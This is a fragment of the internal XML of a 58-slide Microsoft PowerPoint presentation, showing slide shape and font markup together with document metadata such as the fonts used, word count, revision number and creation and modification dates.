              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\36.png)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9758" y="713677"/>
            <a:ext cx="99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ulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ONE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Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127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38" y="1659054"/>
            <a:ext cx="5547637" cy="49539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052" y="1659054"/>
            <a:ext cx="5664809" cy="505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4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2752</TotalTime>
  <Words>1985</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>346</Paragraphs>
  <Slides>58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8" baseType="lpstr">
      <vt:lpstr>Gulim</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>华文行楷</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>宋体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程 康</cp:lastModifiedBy>
  <cp:revision>336</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-11-23T09:38:56Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-07T05:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>